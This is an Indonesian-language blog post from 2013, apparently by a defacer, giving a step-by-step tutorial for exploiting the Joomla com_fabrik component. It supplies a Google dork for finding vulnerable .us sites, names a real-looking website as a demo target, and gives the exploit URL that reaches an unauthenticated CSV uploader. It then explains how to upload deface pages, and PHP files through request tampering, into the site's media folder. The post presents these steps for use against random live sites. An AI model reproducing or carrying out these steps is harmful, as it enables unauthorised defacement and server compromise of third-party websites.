Posted by : Unknown
Jumat, 31 Mei 2013
Halo,kembali lagi dengan saya bang vladimir :D
Kali ini saya akan share tentang Exploit Com_Fabrik exploit ini hampir sama dengan exploit sebelumnya yaitu Com_Media Exploit ..
Jadi kita disini mencari web yang akan di tanem Exploitnya dan kita Upload file .HTML ataupun .TXT milik kalian :)
Jadi langsung saja untuk tutorial ikuti caranya dibawah ini :)
1.Cari Dork dengan cara :
inurl:index.php?option=com_fabrik site:.us
( Kreasikan dork anda dengan mengganti site yang di ingiinkan *Cari saja di google banyak kok :P )
2. Lalu kita cari target untuk di Exploit , Saya akan memberi demo untuk test page .
Sebelum di kasih Exploit :
http://www.weddinginitaly.us/index.php?option=com_fabrik&view=form&fabrik=2&random=0&Itemid=11
3.Lalu disini kita langsung saja masukan Exploit Com_Fabrik nya dengan cara mengganti Text yang berwarna Merah tersebut dengan Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
( Contoh : http://target.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher )
4. Lalu bila Website tersebut vuln Maka kalian akan masuk ke Uploader CSV , Seperti inilah uploader nya :
5. Upload file .HTML atau .TXT milik kalian , lalu sesudah di upload nanti kalian bisa cek di http://targetmu.com/media/hasilupload.txt // .html dan atau bisa juga upload file .PHP dengan cara metode Tamper Data :)
Tadaaa...Kalian sudah menanam File deface milik kalian..
Sekian untuk tutorial Com_Fabrik Exploit..
Semoga Bermanfaat
reWrite by Vladimir